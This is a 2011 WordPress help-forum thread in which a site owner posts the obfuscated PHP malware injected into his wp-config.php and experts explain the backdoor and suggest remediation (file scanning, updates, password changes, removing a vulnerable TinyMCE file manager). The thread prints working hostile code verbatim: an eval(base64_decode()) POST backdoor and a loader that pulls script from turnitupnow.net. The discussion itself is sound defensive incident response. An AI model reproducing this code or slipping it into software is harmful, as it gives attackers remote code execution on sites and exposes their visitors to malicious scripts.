Ask your WordPress questions! Pay money and get answers fast! Comodo Trusted Site Seal
Official PayPal Seal

Site hacked WordPress

  • SOLVED

Hi,

I got this nasty code added in my wp-config file.

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

That code is removed now and my wp-config.php is moved out from web folder.

I have debuged it and have a fairly understanding of it. That is no longer an issue.

But I wonder how I got infected in order to prevent from it happening again.

So my questions are:

How one gets infected and how to prevent it from happening again?

Regards,
Gabriel

Answers (8)

2011-11-10

Francisco Javier Carazo Gil answers:

Gabriel,

1. Check correct file permissions: http://wordpress.org/extend/plugins/wp-security-scan/
2. Change your FTP and MySQL user password.
3. Update WP and all your plugins
4. Change you database prefix
5. Create another user with admin role and delete "admin"
6. Use strong passwords (WP users, FTP and MySQL)
7. In your case: look for "http://turnitupnow.net" in all your files
8. Dump your database and look for the same string in all registers

If I remember anymore, I will tell you.


Gabriel Reguly comments:

Thanks Francisco,

Code is obfuscated, and the hack is pretty smart.

From turnitupnow it gets some code to create a new file, that file was removed by me too.

The new file then gets some javacript from http://facetoface.de/ext/

That is how far I have got into this, until now.

Regards,
Gabriel



2011-11-11

efishinsea answers:

This hack also impacted non WP sites (like ZenPhoto) and was executed against an exploit in the Ajax File Manager included in TinyMCE by some CMS systems. I do not believe it is originally part of TinyMCE directly.

You can read more details info here: http://www.zenphoto.org/trac/ticket/2005

I would search your site(s) for TinyMCE and remove it, or update it to the latest version.

You should also check *EVERY* file in your site for any sign of the above code (...global $sessdt_o;...) since the exploit writes this code into *EVERY* available PHP and htaccess file it can get ahold of, even if it is outside of your main application folder.

In my case, I had a shared account with several sites hosted in it, and all of them were infected through the initially attacked site, all the way into the root bash files.


Good luck!


Gabriel Reguly comments:

Thanks efishinsea, that was the answer I was looking for.

I also have a shared account, with several sites and different versions of different systems.

Some where infected and others were not, but at least now I know where to look for to prevent it from happening again.

Regards,
Gabriel

2011-11-10

Sébastien | French WordpressDesigner answers:

have you read your logs Gabriel ?


Gabriel Reguly comments:

Hi Sébastien,

Not yet, thanks for the tip.

I'll go out for lunch now and later will post my findings.

BTW, there is a thread here:
[[LINK href="http://stackoverflow.com/questions/8068871/got-hacked-anyone-know-what-this-php-code-does"]]http://stackoverflow.com/questions/8068871/got-hacked-anyone-know-what-this-php-code-does
[[/LINK]]

Regards,
Gabriel

2011-11-10

Luis Cordova answers:

security issues, SQL injection probably, you are not cleaning input urls, this is the weakness in systems like wp... once you inject some nice code into some pluging url or something then everything is possible and you probably have some uploading capability in wp, that is it. clean the way for hackers to get in


Luis Cordova comments:

I recommend to dump database and clean your input, of course it is not worth it the work because it is time consuming, only if it is needed, like you have gold in your db.


Gabriel Reguly comments:

Hi Luis,

I think WordPress core does a pretty decent job of keeping itself safe, it is the plugins and themes that sometimes can be problematic.

Thanks for sharing your thoughts, albeit it seems like a rant.

And I will have a look at the database as you suggested.

As I said, the infection code is removed and the hack seems to be halted.

But there always the possibility of a backdoor/script shell somewhere.


Regards,
Gabriel


Luis Cordova comments:

not a rant, if you have 1 form, then CSRF attacks are possible, and i don't think you are checking for that for instance.


Luis Cordova comments:

check framework like symfony2 for a secure way of doing things
and also WAD or such app to test your app against SQLI

2011-11-10

Julio Potier answers:

Hi

this code is dangerous :
if (isset($_POST[$sessdt_p])) {
eval(base64_decode(str_replace(chr(32), chr(43), $_POST[$sessdt_p])));
exit;
}


It means that if someone craft a post form with a field named "sessdt_p", this person can "eval" php code into your website.

You really have to check ALL files inside your plugins/templates/code.
if i were you, i reupload a new wordpress installation, reupload my theme and all my plugins.
Take care of files_from_nowhere, if a file is not from WP/theme/plugin/you : delete it.

Also listen Francisco Javier Carazo Gil, he's right.

See you and good luck.

If you have any other question you can ask (i'm web security consultant)


Gabriel Reguly comments:

Hi Julio,

Thanks for the advice, I have already grok that.

Later I'll post a link to the files of the hack.

Gotta have some lunch now ;-)

Regards,
Gabriel


Gabriel Reguly comments:

Hi Julio,

Did you know about this site [[LINK href="http://urlquery.net/about.php"]]http://urlquery.net/about.php[[/LINK]]?

Regards,
Gabriel


Julio Potier comments:

No i don't now it.

2011-11-10

Lawrence Krubner answers:

My site was hacked this summer. I got some decent feedback here:

http://www.wpquestions.com/question/showLoggedIn/id/2829


Lawrence Krubner comments:

Luis and I are both fans of the Symfony framework, partly because it is so secure. WP Questions is built with Symfony.

I think if Luis sounds like he is ranting, part of that is simply frustration. I am frustrated too. The team building Wordpress and the team building Symfony have very different attitudes about security. I prefer the attitude of the Symfony team. Wordpress could be more secure, but the Wordpress team needs to make it a priority.


Gabriel Reguly comments:

Hi Lawrence,

I do remember that, and it was one of the reasons I felt that asking for help here would be a good thing.

The other reason was the exceptional help I see that experts provide here day after day. :-)

Thanks for the excellent service your site provides!

Regards,
Gabriel

2011-11-10

Maor Barazany answers:

In addition to all of the above, the [[LINK href="http://wordpress.org/extend/plugins/exploit-scanner/"]]Exploit Scanner[[/LINK]] plugin is a very important one to use. It scans all of the files (WP core /themes/plugins etc) and report for bad code you can check.
I once had a hack that put a file in the wp-includes folder, and unless it was removed, that site kept rehacked again and again.

Also, I advise to completely delete WP core files (except the wp-content folder) and re-install it.


Gabriel Reguly comments:

Thanks Maor,

Regarding WordPress, I am confident that my core files are clean now but I do have some other files besides WP core, and I am afraid they might be used to do the hack again.

Seems that efishinsea answer is the one that will help me.

Anyway, thank you again for your help.

Regards,
Gabriel

2011-11-10

Dylan Kuhn answers:

It's difficult to find the source of the original infection. Sometimes the timestamps on modified or added files can help find the original hack requests in the logs. Look especially for suspicious POST requests.

The exploit scanner plugin finds a lot of false positives, but it's worth looking through the output for more suspicious deposits:

[[LINK href="http://wordpress.org/extend/plugins/exploit-scanner/"]]http://wordpress.org/extend/plugins/exploit-scanner/[[/LINK]]

Now keep an eye on your filesystem for unauthorized changes:

[[LINK href="http://wordpress.org/extend/plugins/wordpress-file-monitor-plus/"]]http://wordpress.org/extend/plugins/wordpress-file-monitor-plus/[[/LINK]]


Gabriel Reguly comments:

Thanks for you answer Dylan.